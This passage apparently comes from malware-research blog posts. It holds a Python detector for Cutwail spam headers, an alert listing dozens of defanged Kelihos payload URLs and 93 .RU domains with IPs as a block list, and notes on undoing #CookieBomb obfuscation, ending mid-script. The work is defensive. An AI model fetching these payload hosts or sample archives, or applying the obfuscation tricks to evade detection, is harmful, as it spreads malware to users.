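    "1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for {MAILTO_USERNAME}@{MAILTO_DOMAIN}; {DATE}"
)

_PLACEHOLDER = re.compile(r"\{([A-Z_]+)(?:\[([^\]]+)\])?\}")
_IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

def _placeholder_regex(kind, arg):
    """Regex for one template token. The meaning of each token is an assumption
    inferred from the header the post matched against the template."""
    if kind == "NUMBER":          # one digit from the given range, e.g. NUMBER[1-2]
        return "[" + arg + "]"
    if kind == "DIGIT":           # DIGIT[n]: n arbitrary digits
        return r"\d{" + arg + "}"
    if kind == "SYMBOL":          # SYMBOL[n]: n alphanumerics ("2D" in the sample id)
        return "[0-9A-Za-z]{" + arg + "}"
    if kind == "BOT_IP":          # the bot writes its own address here
        return "(?P<bot_ip>" + _IPV4 + ")"
    if kind == "MAILTO_USERNAME":
        return r"[^@\s]+"
    if kind == "MAILTO_DOMAIN":
        return r"[^\s;]+"
    if kind == "DATE":
        return r".+"
    raise ValueError("unknown template token: " + kind)

def template_to_regex(template):
    """Turn a spambot header template into an anchored regex: literal text is
    escaped, every {TOKEN[...]} becomes the pattern above."""
    out, pos = [], 0
    for m in _PLACEHOLDER.finditer(template):
        out.append(re.escape(template[pos:m.start()]))
        out.append(_placeholder_regex(m.group(1), m.group(2)))
        pos = m.end()
    out.append(re.escape(template[pos:]))
    return re.compile("^" + "".join(out) + "$")

CUTWAIL_RE = template_to_regex(CUTWAIL_TEMPLATE)

def unfold_header(raw):
    """Join RFC 5322 folded continuation lines (leading whitespace) and collapse
    whitespace runs, so the regex sees the header as one line."""
    return re.sub(r"\s+", " ", re.sub(r"\r?\n[ \t]+", " ", raw)).strip()

def match_cutwail_received(raw_header):
    """None when the header does not follow the template; otherwise the address
    the bot *claims* it relayed from and the address it wrote as its own."""
    line = unfold_header(raw_header)
    m = CUTWAIL_RE.match(line)
    if not m:
        return None
    claimed = re.search(r"from \[(" + _IPV4 + r")\]", line).group(1)
    return {"claimed_relay_ip": claimed, "spambot_ip": m.group("bot_ip")}

# The header from the post, folded as a mail client shows it.
SAMPLE_CUTWAIL_HEADER = (
    "Received: from [143.214.203.103] (port=30877 helo=[192.168.8.11]) by 69.199.182.82 with\n"
    "\tasmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500"
)
# Constructed ordinary Received header (documentation addresses) that must not match.
SAMPLE_BENIGN_HEADER = (
    "Received: from mail.example.net ([203.0.113.5]) by mx.example.org with ESMTP\n"
    "\tid abc123 for <user@example.org>; Wed, 17 Jul 2013 15:30:00 -0500"
)

if __name__ == "__main__":
    print(match_cutwail_received(SAMPLE_CUTWAIL_HEADER))
    print(match_cutwail_received(SAMPLE_BENIGN_HEADER))
```

Two caveats when using this for filtering: the "from [...]" address is generated by the bot, so the regex confirms only that it is shaped like Cutwail's output, and any Received line written by the bot (including the "by" address) is under the bot's control; the hop you can trust is the Received line your own MTA added on top, which records the peer that actually connected.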

Mitigation

By understanding the templates used by spambots, we can do many things to block these spambots' malvertisement at the SMTP layer. Sadly, as happened in this case, mostly they are in encrypted or encoded XML and cannot be seen right away. We should pay more research attention to these and spread the discovered spam templates to the whole filtration industry. For another example, of a different spambot's template:

Recently, we had a case where we popped and exposed one of these templates while we nailed a Kuluoz network, in this case here -->>[PASTEBIN].

In that case we decrypted (yes.. that one was not encoded but encrypted, so we did not decode it) the spambot template, and it shows the spoofed email header below:

↑In this case we see the spoofing of the Outlook Express email client (MUA). Please note the fake character set used.

Back to our original case: in the relay log ID part of the template, we can see the "static" string below being used:

with asmtp id 1rqLaL-000
and we know this is the unique string of the template I received (which was explained as the Cutwail spambot's template), so let's see "how many" and "what kind of spam" they already sent us using this template. I just grep for that static string in my spam database (a mailbox collection I made of the garbage these botnets sent to my honeypot), as per the picture below:

These are the snapshots of recent ones (click to enlarge the picture) :

See the one with my name printed in the zip file name?
One of the spambot templates is implemented in the attachment filename; to be precise, like this one:

The above additional three samples are attached with Fareit, Fareit and Fareit.

So we know each other now (smile), and we also know WHICH crime group of moronz is using WHAT and spreading WHICH malware mess now. We're getting closer to nailing these scums for good. To these moronz: go and send me more of your spams! :-)

Sample

We share this information with common people and security researchers to raise the understanding and the detection ratio of SMTP-layer filtration for these threats.

I attached the samples I gained, for research purposes by security experts only, in here-->>[MediaFire]

#MalwareMustDie!

Additional:
I credit the wonderful support from all the fellow researchers who helped this analysis and the MalwareMustDie project in general; we would not have made it this far without all of you.

I dedicate this writing to the upcoming DEF CON and BlackHat 2013. I am still struggling to figure out how to attend; hopefully I can make it, God knows how much I want to go and meet many good friends there (believe me), it is just that my health and my tight day-work schedule are obstacles to overcome.. But if I can't make it I will surely go to DerbyCon this year.

#Alert - Kelihos payload download zone in .RU 93 domains still ALIVE - RedKit EK #malware distribution!

We detected a massive RedKit infection in Japan, as posted by our Japanese team here -->>[0day.jp]
The RedKit attack was targeting innocent popular sites, like a site about the happy relationship between mother and child and an office document navigation site, as per the snapshot below (we detected 54 sites out of 214 URLs infected). After cracking the exploit code we found these are the payloads used:

and

We always urge our team to post the infection URLs into URLquery for the sorting and PoC purpose, and so in this case too; the total URLs grepped two days ago are:
// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141
Of course we issued requests for immediate shutdown of these payload domains, which are 97 in total (so far.. maybe more.. please inform us if you find more). But it looks like, until the moment this post is written, only four domains got shut down and 93 of them are still up and alive, as per the list below of DGA .RU domains and the IPs used:
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
hozfezbe.ru,178.210.222.205,
Since the weekend is coming and I bet the infection is still in the wild, we urge everyone to block the .RU domains listed, as a precaution in case we cannot shut this mess down in time.

Your cooperation is highly appreciated, with thank you in advance!

#MalwareMustDie!

Some encoding note(s) on modified #CookieBomb attack's obfuscated injection code

We posted about the attack related to this injection code on many web pages, as per here: -->>[previous post]. I called this the #CookieBomb attack: it uses obfuscated JavaScript to burp a hidden redirection via IFRAME, and a cookie condition to be used as a ticket for malware infection or further malicious redirection. This post is an additional note on recent updates of the injection code used, as a notice of the adjustments needed for the automation tools that detect related infected sites (if necessary).

Recently I saw slight modifications to the injected script they use for infection, which I tried to document here in the following points.

1. Method of PHP script wrapping

A simple trick which uses the PHP "echo" command to obfuscate the JavaScript code wrapped within it.

I saw a newly infected site with code like this one just now; it is a good gardening shop site, a victim website:

If you look at the infected/hacked site, it shows the code " " in the upper left corner of the page, and thus in the HTML code you can see the malicious code injected into it. The injected code has the same pattern of long runs of white space as a silly attempt to hide it.

The problem is that if you scan it as-is with the "known" tools, the scan cannot be performed properly, i.e. you will get a result like this-->>[LINK-1] or this-->>[LINK-2],
which shows no malicious detection (except maybe the long white-space trail). Yes, this code "currently" cannot be processed by the JavaScript auto-decoding tools, and that is exactly what the bad guys want.

So let's take a look closer at the code:

The bad actors are using JavaScript wrapped in a PHP command, in this case the echo command, which requires every quote sign inside the string to be escaped with a backslash "\". This is why the automation cannot decode it well: what it is looking at is actually a PHP script, not JavaScript.

So what are we supposed to do to overcome this? All we have to do is remove those characters (marked in green above) and then you can decode it at will in any JavaScript decoding tool to get the #CookieBomb code as per below:

This scheme will surely change, but don't worry or be afraid of it: no matter what these bad actors make, we shall crack it. Sorry for the "light" technicalities this time, but the impact of this matter is huge and the infection is wide, so I assume the awareness is necessary. Note that this is not only a #CookieBomb matter: the same trick can be used to evade automation and detection of other malicious obfuscation too.

Samples

I share my decoding note, in case you don't want to risk accessing the infected site mentioned above, here-->>[SAMPLE].
The password is as usual.

2. Method of mixing hex number

I found infected sites as per the snapshot below:

In the picture above it looks like the usual #CookieBomb obfuscated code, but it is not.
My fellow co-workers complained to me that they could not decode it using the automation, which I checked in Wepawet and Jsunpack to confirm, as shown below:

If you look at the code more closely you will see it contains a new obfuscation trick: characters are stated as their hex values, as snipped below:

As you can see, the hex values "0x62" and "0xa-02" are used in the obfuscation code.

In the first part you change the hex into its ASCII character (0x62 is 98, i.e. "b"), and in the second part, if you evaluate the hex arithmetic (0xa-02 is 10-2, i.e. 8, since a leading 0 makes 02 an octal literal), you can substitute the result directly into the code:

Then you can decode it without problem in your favourite decoder tool, which for me is the "ape" one :-)
The decoded result:

3. Method of string splitting & mixing hex code operation with integer

There is an infected site injected with #CookieBomb code as per below:

The code is as below and cannot be processed by the automation tools; the question is why?

If we look carefully at the marked parts below, there was a modification:

As previously explained, it uses the mixed hex characters to replace the real value, but now it adds string splitting of the hex characters, as seen in line 5. Also note in line 32 the condition combining hex and an integer (0x19==031, which is 25==25 since 031 is octal) and the subtraction of a hex value from the integer stored in the variable "bv".

Just change the values noted in green and you can decode it in any tool you prefer. PS: in a SpiderMonkey or Rhino simulator this code will run without problem and store the result instantly.
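The three tricks described above (PHP echo wrapping, hex-valued characters, split strings with hex/octal arithmetic) can be undone mechanically before the code is handed to a normal JavaScript decoder. The script below is an added example written for this note, not the tool used in the post or code from the injection itself. The exact shape of the PHP wrapper is assumed to be `<?php echo "..."; ?>` (the post only says the JavaScript sits inside an echo with backslash-escaped quotes), and the sample input is constructed to combine the tricks, not copied from a real infected site. It folds `0xa-02` to `8`, `0x19==031` to `true`, `bv-0x5` to `bv-5`, `"\x62"+"v"` to `"bv"`, and applies PHP's own double-quoted-string escape rules so the result is what the server would really have sent to the browser.

```python
import re

# JavaScript integer literal forms seen in the modified injections:
# hex (0x62), legacy octal (031) and plain decimal.
HEX = r'0[xX][0-9a-fA-F]+'
OCT = r'0[0-7]+'
DEC = r'\d+'
NUM = rf'(?:{HEX}|{OCT}|{DEC})'


def js_int(lit: str) -> int:
    """Value of a JS integer literal: 0x.. is hex, a leading 0 with octal digits is legacy octal."""
    if lit[:2].lower() == '0x':
        return int(lit, 16)
    if len(lit) > 1 and lit[0] == '0' and set(lit) <= set('01234567'):
        return int(lit, 8)
    return int(lit)


# --- 1. PHP "echo" wrapper (assumed shape: <?php echo "<script>...\"...\"</script>"; ?>) ---
_PHP_ECHO = re.compile(r'<\?(?:php)?\s*echo\s*"((?:[^"\\]|\\.)*)"\s*;?\s*\?>', re.S)
_PHP_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_PHP_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
               'f': '\f', '\\': '\\', '$': '$', '"': '"'}


def php_unescape(body: str) -> str:
    """Apply PHP double-quoted-string escape rules, i.e. produce what the server emits."""
    def sub(m):
        e = m.group(1)
        if e[0] == 'x':
            return chr(int(e[1:], 16))
        if e[0] in '01234567':
            return chr(int(e, 8) & 0xFF)
        return _PHP_SIMPLE[e]
    return _PHP_ESC.sub(sub, body)


def unwrap_php_echo(src: str) -> str:
    return _PHP_ECHO.sub(lambda m: php_unescape(m.group(1)), src)


# --- 2./3. numeric tricks: 0x62, 0xa-02, 0x19==031, bv-0x5 ---
_CHAIN = re.compile(rf'(?<![\w.$])({NUM}(?:\s*[-+*]\s*{NUM})+)(?![\w.])')
_LONE = re.compile(rf'(?<![\w.$])({HEX}|{OCT})(?![\w.])')
_CMP = re.compile(rf'(?<![\w.$])({NUM})\s*(===?|!==?)\s*({NUM})(?![\w.])')


def _eval_chain(expr: str) -> int:
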